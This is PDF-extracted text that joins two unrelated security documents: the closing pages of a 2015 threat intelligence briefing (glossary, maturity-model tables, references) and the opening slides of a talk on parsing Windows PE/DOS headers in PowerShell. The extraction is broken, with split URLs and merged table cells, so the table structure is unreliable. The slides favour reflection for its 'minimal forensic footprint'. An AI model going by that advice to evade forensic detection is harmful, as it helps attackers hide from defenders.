NDA  Non-disclosure agreementPsExec   A tool from Microsoft that allows running of commands on remote machines. Used legitimately by systems administrators, but also by a number of attackers
RAT   Remote Access Tool – Malware to allow remote control of a computer
RSS Feed  RSS (Rich Site Summary) is a protocol for organising content so that new content can be detected programmatically and delivered via a feed
SHA-1 hash  Similar in concept to MD5 hash but 160 bit and 
considered a better algorithm
SIEM  Security Incident and Event Management – Software 
to allow correlation and investigation of alerts
Snort  An open source network-level IDS –  https:/ /www.snort.org
YARA   A pattern-matching tool for writing and matching 
malware signatures – https:/ /plusvic.github.io/yara/Glossary
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk30/36Maturity models can be useful tools  
that help an organisation to define what  success looks like – and then to break  
it down into manageable stages. By  
designing a model that supports and codifies the organisation’s direction, those involved in its implementation can gain  
clear guidance as to the specific steps to 
take. Maturity models also provide feedback to teams implementing change, as they  can see their level of maturity in each  area progressing throughout the project.Maturity models are best designed by those within the organisation, clearly mapping the successive steps needed to reach the 
desired result. Given here are examples  
of maturity models for the four types of threat intelligence.Maturity ModelAn Introduction To Threat Intelligence (CERT-UK 2014) Overview of threat intelligence and different 
sharing formats  
http:/ /www.cert.gov.uk/resources/
best-practices/an-introduction-to-threat-in -
telligence
10 Steps to Cyber Security (GCHQ 2015) 
A resource for business to help address the 10 most important areas with regard  to cyber security https:/ /www.gov.uk/government/publica -
tions/cyber-risk-management-a-board-lev -
el-responsibilityGuide to Cyber Threat Information  Sharing (NIST) A detailed overview of the challenges and 
some solutions relating to sharing threat 
intelligence  
http:/ /csrc.nist.gov/publications/drafts/800-150/sp800_150_draft.pdf
Effective Threat Intelligence  
(ContextIS 2015) A partner work to this piece, covering pro -
tecting networks through threat intelligence http:/ /mwr.to/ctxti
The Threat Intelligence Cycle  
(Krypt3ia, 2014) Blog post covering the threat intelligence cycle and an overview of the subject 
https:/ /krypt3ia.wordpress.
com/2014/10/02/the-threat-intelli -
gence-cycle/OSINT (Rohit Shaw) Introduction to and overview of threat intelligence  
http:/ /resources.infosecinstitute.com/osi -
nt-open-source-intelligence/
The Chinese People’s Liberation Army 
Signals Intelligence and Cyber Reconnais -
sance Infrastructure (Stokes, Lin, Hsiao, Project 2049, 2011) An excellent example of how much insight can be gained via open source intelligence from foreign language sources  
http:/ /project2049.net/documents/pla_third_department_sigint_cyber_stokes_lin_hsiao.pdfFurther Reading
31/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukRequirements  
 
 
Awareness of threats 
 
 
Collection  
 
 
Analysis  
 
 
Production / Evaluation  
  
  
SharingAREA
Board and senior  
managers unaware of threat 
intelligence and the team 
responsible for it
 
No awareness of threats to organisation  
  
 
None  
 
 
No analysis; any sources  
consumed are reported directly  
   
 
Threat intelligence not  
involved in strategic  decisions  
   
No sharing1
Board and senior managers 
aware, occasional intelligence 
offered by team and  
sometimes considered.  Rarely, if ever, acted upon
Some awareness of threats, 
focusing on one or several  
of the more commonly  
discussed actors. No  
tracking of motivations or 
development of threats  
Small number of sources  consumed. A focus on  
‘overview’ style articles or 
reading other people’s  analysis on the same topic 
 
Some analysis of sources  
and verification of content  of overview articles. Some  
attempt made to map to  
general businesses
 
  
Threat intelligence  
considered but generally disregarded
 
 
Individuals at similar  
organisations identified  with whom it might be  
possible to establish a  
sharing relationship2
Threat intelligence pushed by team on big issues; board 
receives and considers  
information  
Some awareness of threats,  focusing on one or several of 
the more commonly discussed 
actors. Attempts to track 
trends of threat motivation, 
economic situation and  technological developments
A focus on reputable,  
well-known sources of  
information in key areas, such 
as popular journals, press. Occasional use of articles 
reporting on situations or 
events, rather than overviews and reviews  
Analysis leading to insight that supports publically available reviews and commentary. 
Broad mapping to general 
businesses or organisations with occasional specificity  
to the organisation itself 
Threat intelligence  
considered and occasionally used to support greater  
protections or defensive 
measures  
 
Semi-regular meetings  
with individuals and some  
non-sensitive sharing, e.g. 
opinions on publically available 
information3
Threat intelligence utilised by management in decision- 
making, particularly decisions 
that are clearly cyber-related 
Deeper insight into trends 
of traditional cyber threats; 
consideration of – and some 
understanding of – less  
commonly discussed threats  
 
 
A number of reputable sources in a variety of areas.  Includes 
some articles from uncommon 
sources, such as foreign  language press or  
lesser-known journals.  
Products  of other threat intelligence 
types occasionally used
Robust analysis of sources, 
leading to insight, particularly where a threat isn’t discussed 
in the open press: i.e.  
surpassing publically available reviews. Intelligence is gained  
by mapping insight to  
understanding of the business
Threat intelligence generally 
used in the implementation of decisions, such as increased 
security budget to mitigate  
a risk. Intelligence rarely changes decision or the  
nature of a decision
Relationship developed and 
trust built, to a stage where  it is possible to trust the  
information received from  
the sharer4
Threat intelligence a routine part of decision-making, with 
advice sought on all major 
decisions  
Awareness of many threats, including those that aren’t 
‘traditional’ cyber threats. 
Robust understanding of the 
motivational, economic, and 
technological developments  of those threats
Large range of sources,  
including economic,  
socio-political, foreign  
language journals, press  
articles, and products of other 
threat intelligence types.  
Focus primarily on reports relating to situations, events  
or statements
Deep analysis, leading to 
insight that surpasses that of review articles on key 
topics. Mapped to business in 
a way that takes into account financial drivers, structure and 
intentions of the organisation  
 
 
Threat intelligence  
occasionally changes  decisions and regularly affects 
how those decisions are  
implemented
 
 
Trusted relationships built  
and maintained with peers  at other organisations;  
regular bidirectional sharing  
of information that helps  both parties to understand 
strategic risk5STRATEGIC
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk32/36Requirements  
 
 
Activity-related attacks:  
note, not all organisations 
experience these attacks
 
 
Attacks by groups  
communicating openly:  
note, not all organisations experience such attacks
 
Communication with staff
  
 
Evaluation
 
  
SharingAREA
No tasking to identify  actvity-related attacks or 
groups who plan attacks 
openly  
 
 
No attempts to identify  activity-related attacks  
  
 
No attempts to monitor groups 
  
 
No plans 
  
No evaluation 
  
 
No sharing1
Broad tasking to identify 
whether attacks are occurring 
as a result of activities, or by a 
group whose communication channels are legally accessible
Attempts made to find an 
activity or event correlated to 
attack types 
 
 
Attempts made to identify 
groups that attack and  communicate using open  
channels  
Key staff identified, who  
will be alerted to an incoming incident  
Report prepared,  identifying how many alerts were produced by operational 
threat intelligence and  
whether they were plausible
Organisations that might be 
attacked by same groups identified2
Specific tasking to investigate a group or activity-related 
attack  
 
Activity-related attacks  
sporadically predicted  
  
 
Open communication  
channels monitored manually by staff for indications of  
attacks being planned  
List of out-of-hours contact 
information  for key staff is maintained and available  
when necessary
Report prepared, containing 
details of how robustly staff responded to alerts, and 
how their actions could be 
improved
Specific individuals at other 
organisations, who would be involved in responding to an 
attack, identified3
Tasking includes specific  
groups or events to target, and 
identifies desired outcomes: 
e.g. how long it should take to trigger a response
Activity-related attacks  
regularly predicted, but no 
coordinated response  
 
 
Staff tracking agitators and 
attempting to consolidate changing aliases and styles  
 
A rehearsal has been  
conducted for an incoming  incident, involving all  
relevant staff
Formal process defined for  
evaluating  the success and failure of individual cases  
 
Other organisations have the 
necessary details of your team members who should be  
alerted in the event of an 
attack4
Requirements evolve with  evaluation; efforts made to  
develop capabilities where 
there is indication of a return  on investment
Activities that result in attacks 
robustly understood, and  
appropriate monitoring in 
place. Response planned; 
success of attack evaluated 
afterwards
Open communication chan -
nels monitored; changing 
aliases tracked, with scripted  
analyses to determine  
when attacks may occur
Regular exercises undertaken 
(including out of hours) for different incident types 
Efforts robustly evaluated, with 
undetected attacks (where detection should have been 
possible) subject to root  
cause analysis
Other organisations have been 
successfully alerted, allowing them to  better protect  
themselves as a result5OPERATIONAL
33/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukAwareness of Remote Access 
Tools (R ATs)  
   
 
Awareness and vulnerability with respect to C2 channels
 
 
Knowledge of modus operandi 
(MO)  
   
 
Application of knowledge of 
MO to organisation  
 
 
 Sharing  AREA
No awareness  
 
  
No specific awareness beyond 
the fact that malware has to 
communicate with attackers  
 
 
Basic understanding of  
attack flow 
 
 
No specific attempts to map attacker MO to organisational 
weaknesses  
 
 
No sharing1
Awareness of the most  common RATs used, such as 
name and capabilities  
 
 
Intelligence team aware of 
common methods such as 
HTTP, HTTPS, DNS  
 
  
Understanding of the fact that 
different attack groups favour 
different methodologies.  
Specific examples of  methodologies can be  provided  
   
 
Key issues exploited by  attackers triaged by likelihood 
and impact  
 
 
Commentary available from organisation’s experts on 
attacker tooling and  
methodology2
Samples of common RATs maintained; third-party  
reports used for information on RATs and matched to samples  
  
Understanding of different 
channels and how various 
types of malware use them,  e.g. that the ‘Havex’ malware 
uses HTTP with tags  
containing the phrase ‘havex’  
  
 
 Knowledgebase maintained 
of how a variety of campaigns 
that have targeted the  
organisation’s industry  
functioned at each stage of attack (e.g. how privileges  
were escalated, etc.)
 
 
Current state of controls in the organisation that mitigate key 
issues assessed  
 
 
Malware samples or studies released by organisation3
In-house analysis of RATs  used to complement and 
expand third-party knowledge; 
focus given to RATs used by groups that are expected to 
target the organisation  
 
Understanding of the likely 
success of attackers who  
use the various types of  communication channel  
within the organisation.  
Triaged list of controls/moni -
toring implemented to prevent, 
detect or impede communica -
tion channels  
 
Detailed knowledgebase  
maintained, including cross  
references between reports, 
possibly including internal re -
ports. Root causes for key stag -
es analysed, e.g. were attackers exploiting an issue, using a tool 
legitimately  that did not exceed normal 
behaviour, etc.  
 
Timeline prepared for mitigating 
most significant or likely issues 
exploited by attackers.  
Monitoring or logging put in place for exploitation of key 
issues that cannot be  
immediately addressed
Attacker methodology  
studies released by  
organisation4
Deep understanding of  
the RATs used by expected 
threat actors that includes  
understanding of capabilities and robust indicators (not  
hashes). Basic data available  
on RATs of groups not believed to target industry
Understanding of specific  
channels used by pieces of 
malware. Susceptibility of organisation to malware  
communicating via those  
channels fully assessed.  Controls or monitoring in  
place wherever feasible, and 
remaining channels under investigation or considered  
an accepted risk
Expert-level knowledge  
maintained on all key  
campaigns / attack groups.  
This includes breakdown of 
tools used (attack-supplied and those built into the OS or 
available from third parties), 
how key stages of the attack are executed, with results mapped 
onto specific issues that are 
exploited by attackers (such as re-used passwords)
Majority of issues exploited  
by attack groups targeting  
the organisation are subject  
to mitigation controls;  otherwise, a remediation plan or 
monitoring/alerting is in place  
Sharing of deep understanding 
of attacker tooling and  
methodology. Organisation 
produces public reports that add to overall understanding 
of attackers by tying together 
malware capability analysis and attack methodology5TACTICAL
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.uk34/36Requirements for indicators  
 
 
Collection of indicators  
  
  
Analysis of indicators  
 
 
Application of indicators  
 
 
Evaluation of indicators  
  
  
Sharing of indicatorsAREA
No specific requirements for technical threat intelligence  
 
  
No collection 
 
 
No analysis, or indicators  
manually actioned  
 
 
No application of indicators to 
organisation  
   
 
No evaluation 
  
 
No sharing1
Requirements are broad, such 
as ‘consume all publically 
available feeds’  
 
 
Ad-hoc collection, e.g.  
from occasional reports or 
collaboration partners  
 
 
Indicators stored in a central 
repository that might be  
ad-hoc (e.g. an Excel  spreadsheet)  
 
Indicators are manually  
actioned by a staff member, 
e.g. by logging onto hosts to 
check for registry paths or looking at firewall logs 
 
Monthly report prepared of 
how many alerts were a result of indicators from specific 
sources  
 
 
Informal sharing with a limited 
audience, e.g. emailing a peer 
at another organisation2
Requirements are specific,  
e.g. ‘identify communication 
to known C2 channels from  
our device, using automated collection and analysis from 
feeds believed to contain 
high-value indicators’
Collection from public feeds  
 
 
Indicators stored in a flexible 
repository that allows filtering 
by metadata  
 
 
Network-based indicators are 
automatically investigated by 
network devices  
 
 
Monthly report contains  
analysis of whether alerts  were false positives, plus 
commentary on validity of the 
indicator producing the alert  
 
 
Manual sharing with a closed group, e.g. copying into an 
email list3
Requirements develop with  
the programme, and have  
both immediate and  
longer-term goals  
 
 
Collection from public feeds, 
and private feeds such as  
sharing relationships  
 
 
Indicators curated and  
higher-value indicators  
prioritised; output  
machine-generated for  
consumption by detection  
or investigation tools
Automatic searching for  
host-based indictors across the 
whole estate, probably utilising 
third-party software  
 
 
Monthly report identifies 
whether verified alerts were generated as a result of an 
indicator that was also detected 
by other mechanisms (such as antivirus), or whether this would 
have been possible  
 
 
Automated sharing of verified 
indicators with a closed group4
Results of evaluation are an  active part of requirement 
setting and management  
of the process  
 
Collection from feeds  
supplemented by managed 
extraction of indicators from 
white papers and reports, as close to the time of release  
as possible
Analysis engine for indicators 
handles collection, analysis, 
linking between different types and sources based on metadata 
and application of indicators  
to data
Indicators of all types  
automatically searched for in 
network traffic and on hosts; 
new indicators that become available are used to search 
through log data for historical 
signs of compromise
Monthly report identifies 
whether verified alerts were generated as a result of an 
indicator that was also detected 
by other mechanisms (such as antivirus), or whether this would 
have been possible. Incidents 
that emerge are analysed to identify whether technical 
threat intelligence should have 
allowed detection sooner
Automated sharing with a  
public group of verified  
indicators that have been  
investigated – and found not  to expose specific attacks 
against the organisation5TECHNICAL
35/36
Threat Intelligence: Collecting, Analysing, Evaluating
mwrinfosecurity.com  |  CPNI.gov.uk  |  cert.gov.ukReferences
1  The Butler Review of Intelligence on 
Weapons of Mass Destruction, 2004 http:/ /news.bbc.co.uk/nol/shared/bsp/hi/
pdfs/14_07_04_butler.pdf
2  BlackHat US, Threat Intelligence Library 
– A New Revolutionary Technology to Enhance the SOC Battle Rhythm, Ryan 
Trost 2014  
http://mwr.to/rtrost 
3  The Blue Pill of Threat Intelligence,  Dave Aitel 2014  
https:/ /lists.immunityinc.com/pipermail/dailydave/2014-October/000769.html
4  Protecting Privileged Domain Accounts, Mike Pilkington 2012  
http:/ /digital-forensics.sans.org/
blog/2012/03/09/protecting-privileged-
domain-accounts-disabling-encrypted-passwords  
See also Sysmon, Microsoft 2015 
https:/ /technet.microsoft.com/en-gb/
sysinternals/dn798348
5  An Overview of the Intelligence Community: An Appraisal of U.S. Intelligence 1996, Commission on the 
Roles and Capabilities of the United 
States Intelligence Community  http:/ /www.fas.org/irp/offdocs/int023.html
6  Structured Analytic Techniques for Improving Intelligence Analysis, US Government 2009  
https:/ /www.cia.gov/library/center-for-the-study-of-intelligence/csi-publications/books-and-monographs/Tradecraft%20Primer-apr09.pdf
7  CiSP – Cyber-Security Information Sharing Partnership  https:/ /www.cert.gov.uk/cisp/
8  Guide to Cyber Threat Information Sharing, NIST 2104 http:/ /csrc.nist.gov/publications/
drafts/800-150/sp800_150_draft.pdf
9  CIR – Cyber Incident Response scheme 
https:/ /www.cpni.gov.uk/advice/cyber/cir/
10  Heartbleed Flaw Said Used by Chinese in Hospital Hacking, Bloomberg 2014 http:/ /www.bloomberg.com/news/
articles/2014-08-20/heartbleed-flaw-
said-used-by-chinese-in-hospital-hacking11  Open Source Intelligence: What Is It? Why Is It Important to the Military?  OSS 1997  
http:/ /www.oss.net/dynamaster/file_archive/040320/fb893cded51d5ff6145f06c39a3d5094/OSS1997-02-33.pdf 
12  The Future of Open Source Intelligence, Corey Velgersdyk for the Elliott School of International Affairs 2010 
http:/ /iar-gwu.org/node/253
13  Sailing the Sea of OSINT in the 
Information Age, Stephen C. Mercado  https:/ /www.cia.gov/library/center-for-the-study-of-intelligence/csi-
publications/csi-studies/studies/
vol48no3/article05.html
14  Castles in the Sky – a blog on malware analysis  
http:/ /jcsocal.blogspot.co.uk/2012/12/
malware-analysis-1-protip.html
15  Structured Analytic Techniques for 
Improving Intelligence Analysis, US Government 2009  
https:/ /www.cia.gov/library/center-for-the-study-of-intelligence/csi-publications/books-and-monograph
16  Attributing Cyber Attacks, Thomas Rid & Ben Buchanan, Journal of Strategic Studies  
Volume 38, Issue 1-2, 2015 http:/ /www.tandfonline.com/doi/full/10.1080/01402390.2014.977382#.VOtYZd4glhM
17  Targeting U.S. Technologies, DSS 2014  
http:/ /www.dss.mil/documents/ci/2014UnclassTrends.PDF
18  The Streaming APIs, Twitter  
https:/ /dev.twitter.com/streaming/overview
19  Security Intelligence: Attacking the Cyber Kill Chain, Mike Cloppert 2009 http:/ /digital-forensics.sans.org/
blog/2009/10/14/security-intelligence-
attacking-the-kill-chain
20  CrowdStrike Global Threat Report 2014  http:/ /www.crowdstrike.com/2014-global-threat-report/ (requires sign up)
21  Exploit This, Gabor Szappanos for Sophos 2015  https:/ /www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-exploit-this-evaluating-exploit-
skills-of-malware-groups.pdf
22  CosmicDuke, F-Secure 2014  
https:/ /www.f-secure.com/documents/996508/1030745/
cosmicduke_whitepaper.pdf
23  The Pyramid of Pain, David Bianco 2014  
http:/ /detect-respond.blogspot.co.uk/2013/03/the-pyramid-of-pain.html
24  A String of Paerls, Williams, Schultz, 
Esler, and Harman, Cisco 2014  http:/ /blogs.cisco.com/security/a-string-
of-paerls
25  Tools and Standards for Cyber Threat 
Intelligence Projects, Greg Farnham  for SANS 2013 
https:/ /www.sans.org/reading-room/
whitepapers/warfare/tools-standards-cyber-threat-intelligence-projects-34375
26  toolsmith – Threats & Indicators:  A Security Intelligence Lifecycle,  Russ McRee 2014 
http:/ /holisticinfosec.blogspot.
co.uk/2014/08/toolsmith-threats-indicators-security.html
27  Threat Library: A SOC Revolution,  Ryan Trost for ThreatQuotient 2014  http:/ /www.isaca.org/Education/
Conferences/Documents/NAISRM/145.
pdf
28  The Collective Intelligence Framework (CIF)  
https:/ /code.google.com/p/collective-
intelligence-framework/
29  Federated Threat Data Sharing with  
the Collective Intelligence Framework, An introduction to CIF, Gabriel Iovino  
et al. 2013  
http:/ /www.internet2.edu/presentations/tip2013/20130116-iovino-security-event-
sharing.pdf
30  The Bro Network Security Monitor 
https:/ /www.bro.org/
31  Guide to Cyber Threat Information Sharing, NIST 2104 http:/ /csrc.nist.gov/publications/
drafts/800-150/sp800_150_draft.pdf
MWR InfoSecurity (Head Office) 
Matrix House, Basing View Basingstoke RG21 4DZ
T: +44 (0)1256 300920 
F: +44 (0)1256 323575
MWR InfoSecurity  
77 Weston Street 
London SE1 3RS
MWR InfoSecurity  
113-115 Portland Street 
Manchester M1 6DW
MWR InfoSecurity (South Africa) 
Homestead Place  
Cnr 12th Ave & Homestead Lane Rivonia, Gauteng 2128. South Africa
T: +27 (0)10 100 3157 
F: +27 (0)10 100 3160
MWR InfoSecurity (Singapore) 
62A Pagoda Street #02-00  
Singapore 059221
T: +65 6221 0725
www.mwrinfosecurity.com  
labs.mwrinfosecurity.com
Follow us on Twitter:  
@mwrinfosecurity  @mwrlabs
© MWR InfoSecurity Ltd 2015.   
All Rights Reserved. 
This Briefing Paper is provided for general information purposes only and 
should not be interpreted as consultancy or professional advice about any  of the areas discussed within it.Parsing Binary File 
Formats with 
PowerShell
Ma t t  Gra eber
@ma t t ifestation
w w w. exploit -monday.com
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.1
PS> Get -Bio
Security Researcher
Former U.S. Navy Chinese linguist and U.S. Army Red Team member
Alphabet soup of irrelevant certifications 
Avid PowerShell Enthusiast
Original inspiration: Dave Kennedy and Josh Kelley " Defcon 18 PowerShell 
OMFG ...", Black Hat 2010
Continued motivation from @ obscuresec
Creator of the PowerSploit module
A collection of tools to aid reverse engineers, forensic analysts, and 
penetration testers during all phases of an assessment .
Love Windows internals, esoteric APIs, and file formats
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.2
Why parse binary file formats?
Malware Analysis
You need the ability to compare a malicious/malformed file against known 
good files.
Fuzzing
You want to generate thousand or millions of malformed files of a certain 
format in order to stress test or find vulnerabilities in programs that open 
that particular file format.
Curiosity
You simply want to gain an understanding of how a piece of software 
interprets a particular file format.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.3
Why use PowerShell to parse 
binary file formats?
Once parsed, file formats can be represented as objects
Objects can be inspected, analyzed, and/or manipulated with ease .
Its output can be passed to other functions/ cmdlets /scripts for further 
processing.
Automation!
Once a parser is written, you can analyze a large number of file formats, 
quickly perform analysis, and gather statistics on a large collection of files.
Example: You could analyze all known good file formats on a clean system, 
take a baseline of known good and use that as a heuristic to determine if an 
unknown file is potentially malicious or malformed.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.4
Requirements
A solid understanding of C/C++, .NET , and PowerShell data types is a 
must!
Windows C/C++ data types are described here:
http://msdn.microsoft.com/en
 -us/library/windows/desktop/aa383751(v=vs.85). aspx
C# value types are described here:
http://msdn.microsoft.com/en
 -us/library/s1ax56ch(v=vs.110). aspx
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.5
Validating data type equality
Goal: Convert C/C++ DWORD to PowerShell type
MSDN Definition: DWORD –“A 32 -bit unsigned integer . The range is 0 
through 4294967295 decimal .”
32-bit == 4 bytes
Best guess: [UInt32]
Validation steps:
1)Validate minimum value -[UInt32]:: MinValue # 0
2)Validate maximum value -[UInt32]:: MaxValue # 4294967295
3)Validate type size -
[Runtime.InteropServices.Marshal ]::SizeOf([UInt32]) # 4
DWORD == [System.UInt32]
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.6
Example: DOS Header
The DOS header is a legacy artifact of the DOS era.
The first 64 bytes of any portable executable file
.exe, . dll, .sys, . cpl, .scr, .com, . ocx, etc...
Size of the DOS header can be confirmed using my favorite debugger –WinDbg
`dt-v ntdll !_IMAGE_DOS_HEADER` or `?? sizeof (ntdll !_IMAGE_DOS_HEADER )`
Per specification, the first two bytes of a DOS header are ‘MZ’ 
(0x4D,0x5A).
Trivia –What does MZ stand for?
Nowadays, the only useful field of the DOS header is e_lfanew –the offset 
to the PE header.
The fields of a non -malicious DOS header are relatively consistent.
To see an awesome abuse of the PE file format and DOS header, check out 
Alexander Sotirov’s TinyPE project.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.7
Example: DOS Header
#define IMAGE_DOS_SIGNATURE                 0x5A4D      // MZ
#define IMAGE_OS2_SIGNATURE                 0x454E      // NE
#define IMAGE_VXD_SIGNATURE                 0x454C      // LE
typedef struct_IMAGE_DOS_HEADER {      // DOS .EXE header
WORD   e_magic;                     // Magic number
WORD   e_cblp;                      // Bytes on last page of file
WORD   e_cp;                        // Pages in file
WORD   e_crlc;                      // Relocations
WORD   e_cparhdr ;                   // Size of header in paragraphs
WORD   e_minalloc ;                  // Minimum extra paragraphs needed
WORD   e_maxalloc ;                  // Maximum extra paragraphs needed
WORD   e_ss;                        // Initial (relative) SS value
WORD   e_sp;                        // Initial SP value
WORD   e_csum;                      // Checksum
WORD   e_ip;                        // Initial IP value
WORD   e_cs;                        // Initial (relative) CS value
WORD   e_lfarlc ;                    // File address of relocation table
WORD   e_ovno;                      // Overlay number
WORD   e_res[4];                    // Reserved words
WORD   e_oemid;                     // OEM identifier (for e_oeminfo )
WORD   e_oeminfo ;                   // OEM information; e_oemid specific
WORD   e_res2[10];                  // Reserved words
LONG   e_lfanew ;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;Windows SDK winnt.h
DOS header definition
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.8
Example: DOS Header
The DOS header is comprised of the following data types:
Optional: An enum representation of e_magic since it contains only three 
possible, mutually -exclusive values.
Again, you can manually validate that these data types match –e.g.
◦LONG -> System.Int32. A 32 -bit signed integer. The range is –2147483648 through 
2147483647 decimal.
◦Min value: [Int32]:: MinValue
◦Max Value: [Int32]:: MaxValue
◦Size: [System.Runtime.InteropServices.Marshal ]::SizeOf([UInt32])C Data Type C# Data Type PowerShell Data Type
WORD ushort [UInt16]
WORD[] ushort[] [UInt16[]]
LONG int [Int32]
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.9
Parsing binary file formats in 
PowerShell –Technique (1/3)
There are three ways to tackle this problem in PowerShell:
1. Easy -Pure PowerShell
2. Moderate –C# Compilation
3. Hard -Reflection
Pure PowerShell –Strictly using only the PowerShell scripting language 
and built -in cmdlets
Pros:
Not complicated. Thus, easy to implement.
Works 
 in PowerShell on the Surface RT tablet –i.e. PowerShell running in a ‘Constrained’ 
language mode.
Cons:
Very slow when dealing with large, complicated binary files
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.10
Parsing binary file formats in 
PowerShell –Technique (2/3)
C# Compilation –Using the Add -Type cmdlet
Pros:
Structures and 
 enums are easy to define and read when defined in C#
Many structures and 
 enums are already defined for you on pinvoke.net.
After compilation occurs, this technique is much faster than the pure PowerShell approach when 
dealing with large, complicated file formats. Get -PEHeader in PowerSploit uses this approach.
Cons:
Doesn’t work on the Surface RT tablet. You are restricted from using Add
 -Type.
Involves calling csc.exe and writing temporary files to disk in order to compile code. This is 
undesirable if you are trying to maintain a minimal forensic footprint.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.11
Parsing binary file formats in 
PowerShell –Technique (3/3)
Reflection –Manual assembly of data types in memory
Pros:
Fast
, minimal forensic footprint (i.e. csc.exe not called and no temporary files created ).
Ideally 
 suited for parsing complicated, dynamic structures –i.e. structures that are defined 
based upon runtime information. Get -PEB in PowerSploit uses this technique.
Cons:
Doesn’t work on the Surface RT tablet. You are restricted from using 
 the .NET reflection 
namespace.
Reflection 
 can be a difficult concept to grasp if you are not comfortable with .NET .
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.12
Reading a binary file in 
PowerShell
There are two generic methods for reading in a file as a byte array:
Get-Content cmdlet
Great for reading small files
Works on the Surface RT tablet
You can optionally read a fixed number of bytes
Example:  
 Get-Content C: \Windows\System32 \calc.exe -Encoding Byte -
TotalCount 64
[System.IO.File ]::ReadAllBytes (string path )
Quickly reads large files
Does not work on the Surface RT tablet
Reads all bytes in a file
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.13
Converting bytes to their 
respective data types
Recall the following:
WORD == 16 -bit unsigned number == 2 bytes
DWORD == 32 -bit unsigned number == 4 bytes
LONG == 32 -bit signed number == 4 bytes, etc...
Note: many file formats store their values in little -endian so you must 
swap their values in order to read the proper values.
Helper function toconvert
bytes into either aUInt 16
oranInt32.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.14
DOS header parsing script 
requirements
Defines the necessary structures and enums present in the DOS 
header 
Reads in a file (or set of files) as a byte array via a function parameter 
or via the pipeline –i.e. BEGIN/PROCESS/END and  
ValueFromPipelineByPropertyName property
Converts the flat byte array to a properly parsed DOS header –
represented as either a custom object or a .NET type
Only returns output from files with a valid DOS header size and 
e_magic field
Displays a properly formatted DOS header using a ps1xml file.
I want all the fields to be displayed in hexadecimal rather than the default 
decimal.
Provides detailed comment -based help
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.15
Building a DOS header parser 
Technique: Pure PowerShell
This technique relies heavily on reading offsets into a byte array using 
array offset notation. For example:
PS> $array = [Byte[]] @(1,2,3,4,5,6)
PS> # If these were little -endian fields, then the array offsets 
would need to be reversed.
PS> $array[1..0]
2
1
PS> $array[0..1]
1
2
A custom object will be formed in this technique since the PowerShell 
scripting language has no way to define a native .NET type.
You must be aware of the offsets to each field in the DOS header definition
Demo: Source code analysis and script usage
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.16
Building a DOS header parser 
Technique: C# Compilation
The DOS header is defined in C# code. It is then compiled using the 
Add-Type cmdlet .
After compilation, a custom .NET type is created and can be used 
directly in PowerShell -[PE+_IMAGE_DOS_HEADER ] in out example.
Note: Once a .NET type is defined, it cannot be redefined in the same 
PowerShell session. Restart PowerShell if you need to make changes to 
your C# code.
The C# technique relies upon obtaining a pointer to our byte array and 
calling [ System.Runtime.InteropServices.Marshal ]::PtrToStructure to 
cast the array into a [PE+_IMAGE_DOS_HEADER ] structure.
Demo: Source code analysis and script usage
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.17
Building a DOS header parser 
Technique: Reflection (1/2)
Rather than compiling our .NET type, we are going to manually 
assembly it.
This technique, although more complicated to implement should be 
preferred to C# compilation if maintaining a minimal forensic footprint 
is your goal or if you are creating dynamic structures that must be 
defined at runtime.
Reflection allows you to perform code introspection and code 
assembly. Requires a basic understanding of the .NET architecture. 
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.18
.NET assembly layout
Assembly
ModuleAppDomain
Type
NestedTypeConstructor
Field PropertyMethod Event
AppDomain
 –An execution ‘sandbox’ for a set of assemblies
Assembly 
 –The dllor exe containing your code
Module 
 –A container for a logical grouping if types. Most assemblies only have a single module.
Type 
 –A class definition
Members 
 –The components that make up a type –Constructor, Method, Event, Field, Property, NestedType
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.19
Building a DOS header parser 
Technique: Reflection (2/2)
The following steps are required to build the DOS header .NET type 
using reflection:
1. Define a dynamic assembly in the current AppDomain .
2. Define a dynamic module.
3. Define an enum type to represent e_magic values.
4. Define a structure type to represent the remainder of the DOS 
header .
5. e_res and e_res2 fields require custom attributes to be defined 
since they are arrays.
Once the type is defined, a .NET type representing the DOS header will 
be defined and be nearly identical to the type created in C# previously.
Demo: Source code analysis and script usage
